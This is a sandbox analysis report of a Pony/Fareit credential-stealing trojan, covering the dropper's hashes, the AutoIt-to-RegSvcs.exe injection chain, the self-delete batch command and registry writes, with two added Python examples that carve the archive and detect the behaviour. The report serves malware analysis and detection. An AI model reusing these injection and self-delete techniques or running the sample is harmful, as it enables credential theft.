General Info

File name: 8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
Full analysis: https://app.any.run/tasks/890037ff-e99b-462a-8f09-3e85ab899f73
Verdict: Malicious activity
Analysis date: 11/8/2018, 17:12:04
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: trojan, pony, fareit, autoit
Indicators: ––
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive
MD5: 0a1607169843dd56b26686fc0b180d04
SHA1: 37c8a45797e686e8d1593bdb64cd3e19b38f610b
SHA256: 8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8
SSDEEP: 12288:OK2mhAMJ/cPlbVwPCkZZMiBKiaWpz1vulrreJA+LmbdjY07+bn1hf3rU6OGPATC7:f2O/GlbHk0SAMBvuwmxhKbH3rUO46GfG

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided as is for the user's information. ANY.RUN does not guarantee the maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration: 120 seconds
Additional time used: 60 seconds
Fakenet option: off
Heavy Evasion option: off
MITM proxy: off
Route via Tor: off
Network geolocation: off
Privacy: Public submission
Autoconfirmation of UAC: on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (68.0.3440.106)
  • Google Update Helper (1.3.33.17)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

Connects to CnC server
  • RegSvcs.exe (PID: 3708)
Detected Pony/Fareit Trojan
  • RegSvcs.exe (PID: 3708)
Application was dropped or rewritten from another process
  • hhl.exe (PID: 1696)
  • hhl.exe (PID: 3440)
Actions look like stealing of personal data
  • RegSvcs.exe (PID: 3708)
Starts CMD.EXE for commands execution
  • RegSvcs.exe (PID: 3708)
Executable content was dropped or overwritten
  • 8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe (PID: 3832)
Drop AutoIt3 executable file
  • 8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe (PID: 3832)
Application launched itself
  • hhl.exe (PID: 3440)
Dropped object may contain Bitcoin addresses
  • hhl.exe (PID: 3440)

More information about signature artifacts and their mapping to the MITRE ATT&CK™ matrix is available in the full report.

Static information

TRiD
  • .exe | Win32 Executable MS Visual C++ (generic) (35.8%)
  • .exe | Win64 Executable (generic) (31.7%)
  • .scr | Windows screen saver (15%)
  • .dll | Win32 Dynamic Link Library (generic) (7.5%)
  • .exe | Win32 Executable (generic) (5.1%)
EXIF (EXE)
MachineType: Intel 386 or later, and compatibles
TimeStamp: 2012:06:09 15:19:49+02:00
PEType: PE32
LinkerVersion: 9
CodeSize: 74752
InitializedDataSize: 58880
UninitializedDataSize: null
EntryPoint: 0xac87
OSVersion: 5
ImageVersion: null
SubsystemVersion: 5
Subsystem: Windows GUI
Summary
Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 09-Jun-2012 13:19:49
Detected languages: English - United States; Process Default Language
Debug artifacts: d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb
DOS Header
Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header (e_lfanew): 0x000000F0
PE Headers
Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 5
Time date stamp: 09-Jun-2012 13:19:49
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics: IMAGE_FILE_32BIT_MACHINE, IMAGE_FILE_EXECUTABLE_IMAGE, IMAGE_FILE_RELOCS_STRIPPED
Sections
Name Virtual Address Virtual Size Raw Size Characteristics Entropy
.text 0x00001000 0x0001231E 0x00012400 IMAGE_SCN_CNT_CODE,IMAGE_SCN_MEM_EXECUTE,IMAGE_SCN_MEM_READ 6.55555
.rdata 0x00014000 0x00001D15 0x00001E00 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ 4.99401
.data 0x00016000 0x00017724 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ,IMAGE_SCN_MEM_WRITE 3.54914
.CRT 0x0002E000 0x00000020 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ 0.394141
.rsrc 0x0002F000 0x0000C2C0 0x0000C400 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ 6.45727
Resources: 1, 7, 8, 9, 10, 11, 12, 100, 101, ASKNEXTVOL, GETPASSWORD1, LICENSEDLG, RENAMEDLG, REPLACEFILEDLG, STARTDLG
Imports: COMCTL32.dll, SHLWAPI.dll, KERNEL32.dll, USER32.dll, GDI32.dll, COMDLG32.dll, ADVAPI32.dll, SHELL32.dll, ole32.dll, OLEAUT32.dll
Exports: No exports.
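The static data above (the TRiD guesses, the sfxrar.pdb path, the GETPASSWORD1/STARTDLG dialog resources and the section table) identify this file as a stock WinRAR SFX stub: the PE image itself is small, and the archive carrying hhl.exe and its companion files rides in the overlay after the last section. Summing the raw sizes in the section table gives 0x20A00 bytes of section data, so with a 0x400-byte header (an assumption; PointerToRawData is not listed) the archive should begin near offset 0x20E00. The following Python is an added example and is not part of the ANY.RUN report: it computes the overlay start from the section headers and carves the RAR archive from it, so the dropped files can be pulled out with unrar or 7z without ever running the sample. The build_fake_sfx helper constructs a minimal stand-in PE for testing; it is not the sample above.

```python
import struct

RAR4_MARKER = b"Rar!\x1a\x07\x00"
RAR5_MARKER = b"Rar!\x1a\x07\x01\x00"


def pe_overlay_offset(data: bytes) -> int:
    """Offset of the first byte after the last section's raw data.

    The loader never maps bytes past max(PointerToRawData + SizeOfRawData),
    which is exactly where an SFX stub keeps its archive.
    """
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_header_size = struct.unpack_from("<H", data, coff + 16)[0]
    first_section = coff + 20 + opt_header_size
    end = 0
    for i in range(num_sections):
        hdr = first_section + i * 40  # IMAGE_SECTION_HEADER is 40 bytes
        size_of_raw, ptr_to_raw = struct.unpack_from("<II", data, hdr + 16)
        end = max(end, ptr_to_raw + size_of_raw)
    return end


def find_sfx_archive(data: bytes):
    """Return (offset, 'rar4'|'rar5') of a RAR marker in the overlay, else None.

    Searching only the overlay avoids false hits on the marker bytes the SFX
    stub itself carries in .rdata in order to locate its payload.
    """
    start = pe_overlay_offset(data)
    overlay = data[start:]
    for marker, kind in ((RAR5_MARKER, "rar5"), (RAR4_MARKER, "rar4")):
        idx = overlay.find(marker)
        if idx != -1:
            return start + idx, kind
    return None


def carve_sfx_archive(data: bytes) -> bytes:
    """Bytes from the RAR marker to end of file: a standalone archive."""
    hit = find_sfx_archive(data)
    if hit is None:
        raise ValueError("no RAR archive in overlay")
    return data[hit[0]:]


def build_fake_sfx(payload: bytes) -> bytes:
    """Constructed test input (not the sample): a one-section PE32 stub whose
    headers occupy 0x200 bytes, one 0x200-byte .text section, then `payload`
    appended as overlay at offset 0x400."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # Machine, NumberOfSections, TimeDateStamp, PtrToSymTab, NumSymbols,
    # SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x0102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (0xE0 - 2)
    # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, ..., Characteristics
    section = (b".text".ljust(8, b"\0") + struct.pack("<IIII", 0x200, 0x1000, 0x200, 0x200)
               + b"\0" * 12 + struct.pack("<I", 0x60000020))
    headers = dos + b"PE\0\0" + coff + opt + section
    headers += b"\0" * (0x200 - len(headers))
    return headers + b"\xCC" * 0x200 + payload


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read()
    off, kind = find_sfx_archive(blob)
    open(sys.argv[1] + ".rar", "wb").write(blob[off:])
    print(f"{kind} archive at 0x{off:x}, written to {sys.argv[1]}.rar")
```

7z can list an SFX payload directly, but computing the overlay offset is what you want when the stub has been patched or when a decoy marker precedes the real archive; running unrar or 7z on the carved .rar then yields hhl.exe and the script files for static review of the AutoIt stage.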


Processes

Total processes: 35
Monitored processes: 5
Malicious processes: 4
Suspicious processes: 0

Behavior graph

8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe (PID 3832, WinRAR SFX: drop and start)
└── hhl.exe jib=xce (PID 3440, AutoIt v3 interpreter; no specs)
    └── hhl.exe C:\Users\admin\AppData\Local\Temp\92255107\KZLRV (PID 1696; no specs)
        └── RegSvcs.exe (PID 3708, #PONY; parent listed as hhl.exe, and PID 1696's module list includes regsvcs.exe)
            └── cmd.exe /c C:\Users\admin\AppData\Local\Temp\6142828.bat (PID 2580; no specs)

Process information


PID: 3832
CMD: "C:\Users\admin\AppData\Local\Temp\8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe"
Path: C:\Users\admin\AppData\Local\Temp\8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
Indicators: ––
Parent process: ––
User: admin
Integrity level: MEDIUM
Exit code: 0
Version info: ––
Modules
Image
c:\users\admin\appdata\local\temp\8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\mpr.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\riched32.dll
c:\windows\system32\riched20.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\clbcatq.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\users\admin\appdata\local\temp\92255107\hhl.exe

PID: 3440
CMD: "C:\Users\admin\AppData\Local\Temp\92255107\hhl.exe" jib=xce
Path: C:\Users\admin\AppData\Local\Temp\92255107\hhl.exe
Indicators: No indicators
Parent process: 8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
User: admin
Integrity level: MEDIUM
Exit code: 0
Version info: AutoIt Team, AutoIt v3 Script, 3, 3, 14, 5
Modules
Image
c:\users\admin\appdata\local\temp\92255107\hhl.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\version.dll
c:\windows\system32\winmm.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\mpr.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\psapi.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\winspool.drv
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll

PID: 1696
CMD: C:\Users\admin\AppData\Local\Temp\92255107\hhl.exe C:\Users\admin\AppData\Local\Temp\92255107\KZLRV
Path: C:\Users\admin\AppData\Local\Temp\92255107\hhl.exe
Indicators: No indicators
Parent process: hhl.exe
User: admin
Integrity level: MEDIUM
Exit code: 0
Version info: AutoIt Team, AutoIt v3 Script, 3, 3, 14, 5
Modules
Image
c:\users\admin\appdata\local\temp\92255107\hhl.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\version.dll
c:\windows\system32\winmm.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\mpr.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\psapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\winspool.drv
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe

PID: 3708
CMD: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Indicators: ––
Parent process: hhl.exe
User: admin
Integrity level: MEDIUM
Exit code: 0
Version info: Microsoft Corporation, Microsoft .NET Services Installation Utility, 4.6.1055.0 built by: NETFXREL2
Modules
Image
c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\wininet.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\shell32.dll
c:\windows\system32\winspool.drv
c:\windows\system32\mpr.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\msi.dll
c:\windows\system32\pstorec.dll
c:\windows\system32\atl.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\mlang.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\version.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\samlib.dll
c:\windows\system32\propsys.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\shdocvw.dll

PID: 2580
CMD: cmd /c ""C:\Users\admin\AppData\Local\Temp\6142828.bat" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" "
Path: C:\Windows\system32\cmd.exe
Indicators: No indicators
Parent process: RegSvcs.exe
User: admin
Integrity level: MEDIUM
Version info: Microsoft Corporation, Windows Command Processor, 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll

Registry activity

Total events: 727
Read events: 717
Write events: 10
Delete events: 0

Modification events

PID | Process | Operation | Key | Name | Value
3832 | 8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 0
3832 | 8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | 1
3708 | RegSvcs.exe | write | HKEY_CURRENT_USER\Software\WinRAR | HWID | 7B32343044424243422D414434422D344538312D393636362D4132383334354232323943367D
3708 | RegSvcs.exe | write | HKEY_CURRENT_USER\Software\WinRAR | Client Hash | EDCA4ED1F4F22D88FA515184E0BBFC63
3708 | RegSvcs.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 0
3708 | RegSvcs.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | 1
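The process chain and the registry writes above are the host-side artefacts worth alerting on: a compiled AutoIt interpreter (company "AutoIt Team") running from Temp with a script argument; RegSvcs.exe started with an empty command line by a parent in Temp (PID 1696's module list already includes regsvcs.exe, consistent with the host being created suspended and written to); a cmd.exe /c <Temp>\<digits>.bat "<exe path>" invocation matching Pony's self-delete routine (the batch content itself is not shown in the report); and a process other than WinRAR.exe writing HWID and Client Hash under HKCU\Software\WinRAR, the key Pony uses to keep its bot identifiers. The HWID value is the ASCII GUID hex-encoded. The ZoneMap writes by PIDs 3832 and 3708 are ordinary side effects of loading urlmon and carry no signal, and pstorec.dll in PID 3708's module list (the Protected Storage API) fits the credential harvesting the behaviour list flags. The following Python is an added example and is not part of the ANY.RUN report: it runs those four checks over constructed Sysmon-style events that mirror the tables in this report. The field names, the shortened dropper name sample.exe and the list of .NET utilities treated as injection hosts are assumptions.

```python
import re
from binascii import unhexlify
from typing import Dict, List, Optional, Tuple

# Constructed telemetry modelled on the process and registry tables in this
# report (Sysmon-style field names). The dropper's SHA256 file name is shortened
# to sample.exe; everything else is copied from the tables.
TEMP = r"C:\Users\admin\AppData\Local\Temp"
REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
WINRAR_KEY = r"HKEY_CURRENT_USER\Software\WinRAR"
EVENTS: List[Dict] = [
    {"type": "process", "pid": 3440, "image": TEMP + r"\92255107\hhl.exe", "company": "AutoIt Team",
     "cmdline": '"' + TEMP + r'\92255107\hhl.exe" jib=xce', "parent_image": TEMP + r"\sample.exe"},
    {"type": "process", "pid": 1696, "image": TEMP + r"\92255107\hhl.exe", "company": "AutoIt Team",
     "cmdline": TEMP + r"\92255107\hhl.exe " + TEMP + r"\92255107\KZLRV",
     "parent_image": TEMP + r"\92255107\hhl.exe"},
    {"type": "process", "pid": 3708, "image": REGSVCS, "company": "Microsoft Corporation",
     "cmdline": '"' + REGSVCS + '"', "parent_image": TEMP + r"\92255107\hhl.exe"},
    {"type": "process", "pid": 2580, "image": r"C:\Windows\system32\cmd.exe", "company": "Microsoft Corporation",
     "cmdline": 'cmd /c ""' + TEMP + r'\6142828.bat" "' + REGSVCS + '" "', "parent_image": REGSVCS},
    {"type": "registry", "pid": 3708, "image": REGSVCS, "key": WINRAR_KEY, "name": "HWID",
     "value": "7B32343044424243422D414434422D344538312D393636362D4132383334354232323943367D"},
    {"type": "registry", "pid": 3708, "image": REGSVCS, "key": WINRAR_KEY, "name": "Client Hash",
     "value": "EDCA4ED1F4F22D88FA515184E0BBFC63"},
]

# Assumed list of signed .NET utilities commonly abused as injection hosts.
HOLLOW_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}
USER_WRITABLE = re.compile(r"\\(?:AppData|Temp|ProgramData|Downloads|Public)\\", re.I)
# cmd /c ""<path>.bat" "<path>.exe" "  (the doubled quote is cmd's own quoting)
SELF_DELETE_BAT = re.compile(r'cmd(?:\.exe)?\s+/c\s+"?"([^"]+\.bat)"\s+"([^"]+\.exe)"', re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def arguments(cmdline: str) -> str:
    """Everything after the (possibly quoted) image path."""
    s = cmdline.strip()
    if s.startswith('"'):
        return s[s.find('"', 1) + 1:].strip()
    return s.split(" ", 1)[1].strip() if " " in s else ""


def decode_hwid(hex_value: str) -> str:
    """Pony stores the host GUID as hex of the ASCII string; fall back to raw hex."""
    try:
        return unhexlify(hex_value).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return hex_value


def rule_dotnet_host_from_temp(ev: Dict) -> Optional[str]:
    """A .NET utility launched with no arguments by a parent in a user-writable path."""
    if ev["type"] != "process":
        return None
    img = basename(ev["image"])
    if img in HOLLOW_HOSTS and not arguments(ev["cmdline"]) and USER_WRITABLE.search(ev["parent_image"]):
        return f"{img} started with no arguments by {basename(ev['parent_image'])} in a user-writable path"
    return None


def rule_autoit_chain(ev: Dict) -> Optional[str]:
    """Compiled AutoIt interpreter in a user-writable path handed a script argument."""
    if ev["type"] != "process" or ev.get("company") != "AutoIt Team":
        return None
    if USER_WRITABLE.search(ev["image"]) and arguments(ev["cmdline"]):
        return f"AutoIt interpreter in Temp running script argument {arguments(ev['cmdline'])!r}"
    return None


def rule_self_delete_batch(ev: Dict) -> Optional[str]:
    """cmd /c <Temp>\\<name>.bat "<exe>": the batch is handed a binary to delete."""
    if ev["type"] != "process" or basename(ev["image"]) != "cmd.exe":
        return None
    m = SELF_DELETE_BAT.search(ev["cmdline"])
    if m and USER_WRITABLE.search(m.group(1)):
        return f"batch {basename(m.group(1))} in Temp given executable path {m.group(2)}"
    return None


def rule_pony_winrar_values(ev: Dict) -> Optional[str]:
    """HWID / Client Hash under HKCU\\Software\\WinRAR written by anything but WinRAR."""
    if ev["type"] != "registry" or ev["key"].lower() != WINRAR_KEY.lower():
        return None
    if ev["name"] not in ("HWID", "Client Hash") or basename(ev["image"]) == "winrar.exe":
        return None
    extra = f" = {decode_hwid(ev['value'])}" if ev["name"] == "HWID" else ""
    return f"{basename(ev['image'])} wrote {ev['name']}{extra} under HKCU\\Software\\WinRAR"


RULES = [rule_dotnet_host_from_temp, rule_autoit_chain, rule_self_delete_batch, rule_pony_winrar_values]


def scan(events: List[Dict]) -> List[Tuple[str, int, str]]:
    """Apply every rule to every event; return (rule name, pid, description) hits."""
    findings = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append((rule.__name__, ev["pid"], hit))
    return findings


if __name__ == "__main__":
    for name, pid, text in scan(EVENTS):
        print(f"[{name}] pid {pid}: {text}")
```

Each rule fires on its own, but the value is in the sequence: AutoIt from Temp, then a silent RegSvcs.exe, then the batch, then the WinRAR key written by the injected host; correlating on the parent chain keeps a lone RegSvcs.exe invocation by a legitimate installer from paging anyone.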

Files activity

Executable files: 1
Suspicious files: 0
Text files: 49
Unknown types: 0

Dropped files

PID
Process
Filename
Type
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\hhl.exe
executable
MD5: c56b5f0201a3b3de53e561fe76912bfd
